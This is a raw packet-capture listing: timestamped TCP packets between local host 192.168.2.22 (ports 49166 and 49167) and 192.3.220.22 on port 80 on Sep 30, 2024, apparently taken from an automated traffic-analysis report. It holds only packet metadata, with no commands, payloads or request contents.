                                                                            Sep 30, 2024 09:53:27.981997967 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.982008934 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.982129097 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.982947111 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.982958078 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.982968092 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.982978106 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.983011007 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.983011007 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.983547926 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.983558893 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.983570099 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.983580112 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.983589888 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.983596087 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.983619928 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.983619928 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.984299898 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.984442949 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.984456062 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.984493017 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.984570980 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.984582901 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.984610081 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.984622955 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.987355947 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.987369061 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.987417936 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.067734957 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067749023 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067759991 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067775965 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067789078 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067814112 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.067821980 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067831039 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.067831039 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.067836046 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067848921 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067874908 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.067883968 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.067981958 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067992926 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068003893 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068013906 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068025112 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068036079 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068032980 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.068032980 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.068053961 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.068064928 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.068603992 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068665981 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068676949 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068703890 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.068712950 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.068717957 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068730116 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068741083 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068752050 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068759918 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.068762064 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068772078 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.068784952 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.069284916 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069295883 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069307089 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069335938 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.069350004 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.069401026 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069411993 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069422960 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069436073 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069448948 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.069463015 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.069470882 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069478035 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.069484949 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069497108 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069519997 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.069533110 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.070224047 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070235014 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070247889 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070271015 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.070295095 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.070306063 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070317030 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070327044 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070338964 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070354939 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.070378065 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.070378065 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.070382118 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070394039 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070405960 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070430994 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.070440054 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.071171045 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.071182966 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.071193933 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.071209908 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.071218014 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.071221113 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.071229935 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.071234941 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.071238041 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.071257114 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.071268082 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.073000908 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.073020935 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.073069096 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.105006933 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.154591084 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.154614925 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.154628038 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.154638052 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.154650927 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.154654980 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.154664040 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.154678106 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.154679060 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.154690027 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.154712915 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:30.734574080 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.029359102 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.034364939 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.034440994 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.034559965 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.039297104 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512454033 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512480974 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512492895 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512505054 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512516975 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512518883 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.512518883 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.512526989 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512540102 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512543917 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.512550116 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.512552977 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512564898 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.512583017 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.512615919 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512626886 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512653112 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.512660980 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.514714956 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.517575026 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.517626047 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.517673016 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.517713070 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.599961996 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.599983931 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.599997997 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.600011110 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.600102901 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.600141048 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.600158930 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.600171089 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.600183964 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.600188971 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.600195885 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.600205898 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.600219011 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.600234032 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.601001024 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601011992 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601023912 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601063013 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.601072073 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.601078033 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601092100 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601136923 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.601145029 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.601762056 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601808071 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.601810932 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601823092 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601843119 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601850033 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.601855993 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601878881 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.601893902 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.602617025 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.602663994 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.602672100 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.602683067 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.602709055 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.602716923 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.605118990 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.605130911 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.605144024 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.605182886 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687406063 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687422991 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687436104 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687484026 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687500954 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687511921 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687531948 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687541008 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687551022 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687551022 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687551022 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687551022 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687562943 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687575102 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687575102 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687586069 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687601089 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687618971 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687637091 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687648058 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687653065 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687659025 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687670946 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687680960 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687757015 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687834024 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.688446045 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.688456059 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.688467979 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.688488007 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.688513994 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.688524008 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.688532114 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.688534975 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.688545942 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.688548088 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.688558102 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.688564062 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.688580036 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.688596964 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.689205885 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.689218044 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.689234018 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.689244032 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.689255953 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.689335108 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.689346075 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.689357996 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.689368963 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.689374924 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.689379930 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.689390898 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.689393044 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.689405918 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.689416885 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.689826965 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.689836979 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.689847946 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.689872026 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.689893007 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.689918041 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.689929008 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.689939022 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.689949989 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.689954042 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.689961910 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.689980984 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.690006018 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.690016985 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.690027952 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.690038919 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.690038919 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.690052032 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.690068960 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.690758944 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.690804005 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.690808058 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.690819979 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.690835953 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.690849066 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.690849066 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.690860033 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.690896034 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.690907001 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.693126917 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.693172932 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.693201065 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.693238020 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.774847031 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.774861097 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.774872065 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.774888039 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.774899960 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.774909019 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.774919987 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.774930954 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.774949074 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.774957895 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.774967909 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.774971008 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.774971008 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.774977922 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.774987936 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.774987936 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.774990082 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.774996996 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775002956 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775029898 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775034904 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775039911 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775067091 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775083065 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775209904 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775232077 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775249958 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775260925 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775269032 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775281906 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775305033 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775331020 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775335073 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775341988 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775397062 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775397062 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775424957 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775435925 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775445938 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775477886 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775495052 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.775546074 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.775556087 CEST8049167192.3.220.22192.168.2.22
